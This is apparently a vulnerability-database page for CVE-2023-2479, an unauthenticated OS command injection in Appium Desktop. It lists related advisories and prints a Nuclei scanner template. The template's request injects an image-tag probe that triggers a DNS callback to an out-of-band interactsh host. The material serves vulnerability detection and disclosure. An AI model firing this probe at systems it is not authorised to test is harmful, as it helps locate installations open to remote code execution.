| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for Cross-site Scripting in Pressbooks | 25 Oct 2023 07:57 | – | githubexploit |
| CVE-2023-2479 | 2 May 2023 18:30 | – | circl |
| Appium Desktop OS Command Injection Vulnerability | 2 May 2023 00:00 | – | cnnvd |
| CVE-2023-2479 | 2 May 2023 00:00 | – | cve |
| CVE-2023-2479 OS Command Injection in appium/appium-desktop | 2 May 2023 00:00 | – | cvelist |
| Zero-Click Remote Code Execution | 23 Mar 2023 07:22 | – | huntr |
| appium-desktop OS Command Injection vulnerability | 2 May 2023 15:30 | – | github |
| CVE-2023-2479 | 2 May 2023 15:15 | – | nvd |
| CVE-2023-2479 OS Command Injection in appium/appium-desktop | 2 May 2023 00:00 | – | osv |
| GHSA-XQ6J-X8PQ-G3GR appium-desktop OS Command Injection vulnerability | 2 May 2023 15:30 | – | osv |
```yaml
id: CVE-2023-2479

info:
  name: Appium Desktop Server - Remote Code Execution
  author: zn9988
  severity: critical
  description: |
    OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
  impact: |
    Unauthenticated attackers can exploit OS command injection through the url parameter to execute arbitrary system commands and completely compromise Appium Desktop Server installations.
  remediation: Fixed in v1.22.3-4
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2479
    - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
    - https://github.com/appium/appium-desktop/commit/12a988aa08b9822e97056a09486c9bebb3aad8fe
    - https://github.com/Marco-zcl/POC
    - https://github.com/d4n-sec/d4n-sec.github.io
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-2479
    cwe-id: CWE-78
    epss-score: 0.22014
    epss-percentile: 0.97365
    cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: appium
    product: appium-desktop
  tags: cve2023,cve,huntr,appium,oast,rce,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/?url=<img/src="http://{{interactsh-url}}">'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource'

      - type: word
        part: header
        words:
          - 'application/json'

      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: status
        status:
          - 404
# digest: 490a00463044022075feed2a4cbc3d1db1169c87010f8fd132f0897225fce5c9025436a22d57654e02203a85337933cce61fe437dc23574284f83145731f443f77f427b8f1a6fbca8b19:922c64590222798bb761d5b6d8e72950
```